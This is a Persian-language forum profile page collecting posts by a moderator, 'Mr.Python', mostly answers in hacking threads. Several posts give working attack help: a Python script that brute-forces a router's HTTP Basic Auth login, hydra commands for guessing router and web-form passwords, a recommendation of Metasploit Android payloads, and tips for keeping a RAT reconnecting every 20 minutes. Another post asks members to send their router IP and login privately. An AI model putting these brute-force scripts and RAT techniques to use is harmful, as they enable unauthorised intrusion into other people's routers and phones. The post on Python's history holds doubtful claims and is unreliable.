Mr.Python

مدير بخش
  • تعداد ارسال ها

    376
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    48

تمامی مطالب نوشته شده توسط Mr.Python

  1. Mr.Python

    معرفی کردم تو پست قبلی 😐
  2. Mr.Python

    پورت از طریق خود مودمتون باز بشه و باید از نوعTCP باشه نه UDP من این شکل پورت باز کردن با نرم افزار رو اطلاعی ندارم . استفاده از payload های ابزار متااسپلویت Metasploit به نظرم معقول تر هست تا Androrat که دیگه قدیمی شده . لینک دانلود نسخه ویندوزی این ابزار: دانلود بعد از نصب وارد پوشه metasploit-framework در درایو سی C بشید و وارد پوشه bin شده یک command prompt باز کنید (دکمه ی Shift + f10 سپس گزینه open command window here ) سپس دستور زیر را وارد کنید(نحوه انکود نرم افزار با انکود command prompt فرق میکنه با اینکار انکود نرم افزار رو به command prompt میشناسونیم ) chcp 1252 و بعد با دستور زیر میتونید ابزار رو اجرا کنید: msfconsole اموزش های این ابزار برای هک سیستم و اندروید تو انجمن موجود هست. همچنین اموزش بایند کردن فایل های اندرویدی.
  3. من هیدرا رو توی ویندوز نصب کردم در هر صورت نباید این ابزار توی دو سیستم عامل مختلف خروجی مختلفی بده . نمیدونم شاید مشکل از خود ابزاره و اپدیت نبودن یا ...
  4. import requests passw = open('pass.txt', 'r').readlines() userw = open('users.txt', 'r').readlines() for user in userw: for pwd in passw: user = user.replace('\n','') pwd = pwd.replace('\n','') code = requests.get('http://192.168.1.1:80/', auth=(user, pwd)).status_code if code== 200: print(' Password Found : %s | Username : %s'%(user, pwd)) break else: print('Authenticated Failed | username : %s | password : %s'%(user, pwd)) اگر بخواید میتونید پایتون رو نصب کنید و از کد بالا استفاده کنید . جای pass.txt مسیر پسورد لیست و جای users مسیر یوزر لیست. جای آی پی و پورت هم میتونید آی پی و پورت رو قرار بدید.
  5. یکبار رمز رو اشتباه بزنید و ببینید url چی مینویسه همونو قرار بدید تو دستور و تست کنید مثلا من رمز رو اشتباه میزنم url‌ مروگرم میشه http://192.168.1.1/error.html پس دستور میشه: hydra -l username -p password 192.168.1.1 http-get /error.html
  6. من اصلا نمیدونم تارگت شما redirect میکنه رو کدوم پورت - اگه همه درخواستای آی پی به یه پورت ارسال بشن ممکنه جواب بده و من هم گفتم: خیلی از مودم و روتر ها با این احراز هویت Ftp رو هم قبول میکنن نه همش تست هم شده - شما هم تست کن شاید شانست به یه همچین روتری خورده اگه نشده که مجبورید تو منابع خارجی دنبال سوالتون بگردید.
  7. به این نوع احراز هویت ها www-authenticated میگن .(HTTP Basic Auth) فکر میکنم بتونید بجای get از ftp استفاده کنید (خیلی از مودم و روتر ها با این احراز هویت Ftp رو هم قبول میکنن): hydra -l admin -P pass.txt 192.168.1.1 ftp /
  8. خیلی راحت کار کرد . به جای آی پی میتونید خود Host رو هم قرار بدید.
  9. Mr.Python

    پروتکل باید tcp باشه remote host هم باید ای پی local خودتون باشه . هر 4 فیلد EXternal & Internal هم باید پورت انتخابی شما باشه خیلی کار ساده ایه .
  10. همون دستوری رو که گفتم وارد کنین بدون هیچ مشکلی میاره شما درخواستتون GET هست ولی اکثر url هایی که پسورد و یوزر میخوان POST‌ هستن یا ftp ای پی رو به همراه پورت + سایت + پارامتر های ورودی + یوزرنیم و پسورد درست رو بفرستید اگر وقت داشتم چشم
  11. امکان نداره کار نکنه . مشکل از جای دیگست نه از ابزار و دستور
  12. از ابزار curl هم میتونین استفاده کنین که کار باهاش راحتتره
  13. برای درخواستای post و get باید از اپشن http-get-form یا http-post-form استفاده کنید و اون قسمتی از url رو که میخواید بهش درخواست post‌یا get بدید توی اون اپشن تعیین کنید: مثلا : hydra -l username -P /root/Desktop/passwordlist.txt 64.66.546.22 http-post-form "/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302" مسیر request ما portal/xlogin هست که پارامتر های ارسالی ed و pw هستند . S بیانگر کد وضعیت درخواست (مثلا 200 و 302 و 403 و 508 و ...) هست که میخوایم اگر عملیات موفقیت امیز بود چه کدی بده بهمون یا ...
  14. Mr.Python

    همونه قشنگ دنبالش بگرد دلیل نمیشه چون فلان مودم یه چیزی نوشته باید همون تو تمام مودمای دیگه باشه کدوم فیلم اموزش؟ هر فیلمی که میبینی برای یه مدل مودمه نه همشون که! تو نت یه سرچی بزنی جواب میگیری
  15. Mr.Python

    یه قسمتی هست NAT رو تب Advanced اونجا تو تب port mapping باید باشه فکر کنم . دنبال اینا بگرد.
  16. نیازی نیست از کوتیشن استفاده کنین. " رو حذف کنین
  17. Mr.Python

    هواوی چه سری ؟ مدل دقیقشو بگو
  18. Mr.Python

    مدل مودم چیه؟ همه جارو گشتی؟
  19. Mr.Python

    دنبال Virtual Servers تو تنظیمات مودم بگردید .
  20. Mr.Python

    پایتون یک زبان برنامه نویسی سطح بالا (نزدیک تر به زبان محاوره ای انسان و دورتر از پیچیدگی های سخت افزاری ) و یک زبان مفسری (اجرای کد ها خط به خط و اجرا و بررسی ساختاری و دستوری در همان زمان / کامپایلر هوشمند) است . پایتون در حال حاضر جزو کند ترین زبان های برنامه نویسی به شمار میرود . یک زبان اسکریپتی ساده . پایتون یک زبان تحت وب و تحت دسکتاپ است اما با این حال برای برنامه های تحت دسکتاپ گزینه های بهتری هم هست مثل جاوا یا خانواده C یا برای برنامه های تحت وب php بهترین گزینه است . اینکه بگوییم با فلان ماژول و دو سه دستور در حیطه "وب" برنامه نویسی میکنیم واقعا به معنای کد نویسی در سطح وب نیست . برنامه نویس پایتون دو نوع هست یکی به صورت pure کدنویسی میکند و دیگری با استفاده از ماژول های آماده . بگذریم . این زبان دوست داشتنی در دو نسخه اصلی 2 و 3 تا به امروز توسعه داده شده . پایتون نسخه 2 عیب های زیادی داشت که برای برطرف کردنش باید توسعه دهنده هاش ریست فکتوری میکردن ! در مراسم PyCon 2020 تمام نقاط قوت و ضعف پایتون 2 بررسی و برای همیشه کنار گذاشته میشه . تاریخ دقیقی نیست اما برنامه ریزی شده که 1 سال و 4 ماه و 20 روز و 6 ساعت این نسخه از پایتون به طور کامل منسوخ بشه و پایتون نسخه 3 به کار خودش ادامه بده.
  21. Mr.Python

    وقتی شما تصویری یا متنی از ارور نمیذاری انتظار داری چیزی بفهمیم؟ همینجوری رو هوا میپرسی؟
  22. Mr.Python

    آی پی ولید valid ip یا همون آی پی پابلیک Public ipمودمتون رو به همراه یوزر نیم و پسورد برام پ.خ کنین.
  23. Mr.Python

    اصلا به اون سایتا کاری نداشته باش
  24. Mr.Python

    عزیز شما میگی من یه رت میخوام شناسایی نشه و یبار اجرا کنه و دوباره نیازی نباشه اجرا کنه و ... منم میگم شناسایی نشدنش محاله مگر اینکه از اندروید های نسخه پایین استفاده کنه یا انتی ویروس نداشته باشه گوشی اپدیت نباشه . باید یکاری کنید اون برنامه طی یه زمان هایی مثلا هر 20 دقیقه خودش اجرا بشه که دوباره ارتباط برقرار بشه (که نیاز هست کد نویسی کنید) اگر برنامه اجرا نشه سوکتی باز نمیشه که ارتباط برقرار بشه . در مورد شبکه مطالعه کنید. پورت های 4444 و 59842 و 12546 رو هم تست کنید . کاری نمیشه کرد باید هی ور بری .
  25. Mr.Python

    بعضی موقعا اگه وارد نشه ارور میده موقع اجرا البته لازم نیست همه ماژول هارو وارد کنی بعضی از ماژول ها نیاز دارن که بایند بشن به فایل خروجی مثل requests . که اگر این ماژول رو استفاده میکنید حتما ماژول idna رو هم تو دستور وارد کنید . نمونه دیگش مثل tkinter